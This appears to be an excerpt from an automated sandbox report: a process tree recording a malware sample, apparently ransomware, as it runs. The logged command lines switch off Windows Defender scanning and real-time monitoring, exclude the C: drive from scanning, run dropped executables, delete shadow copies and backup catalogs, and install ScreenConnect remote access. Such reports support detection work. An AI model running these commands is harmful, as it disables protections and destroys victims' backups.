\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3056
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4196
-
-
\??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exec:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:712
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C timeout 102⤵
- Suspicious use of WriteProcessMemory
PID:4880 -
C:\Windows\SysWOW64\timeout.exetimeout 103⤵
- Delays execution with timeout.exe
PID:4564
-
-
-
C:\Windows\tasks\MpResult.exe"C:\Windows\tasks\MpResult.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2260 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵PID:4072
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C timeout 302⤵
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\SysWOW64\timeout.exetimeout 303⤵
- Delays execution with timeout.exe
PID:4148
-
-
-
C:\Windows\tasks\SA.exe"C:\Windows\tasks\SA.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2796 -
C:\Windows\tasks\SA.exe"C:\Windows\tasks\SA.exe" n27963⤵
- Executes dropped EXE
PID:4748
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵PID:4528
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:4660
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:4172
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3560
-
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Windows\tasks\0.msi"2⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:1580
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2304
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:220
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:3848
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
PID:608 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1E0DB3E7069B9D0B6719E8813D6F2CF2 C2⤵
- Loads dropped DLL
PID:4196 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI233E.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259466281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments3⤵
- Loads dropped DLL
PID:2532
-
-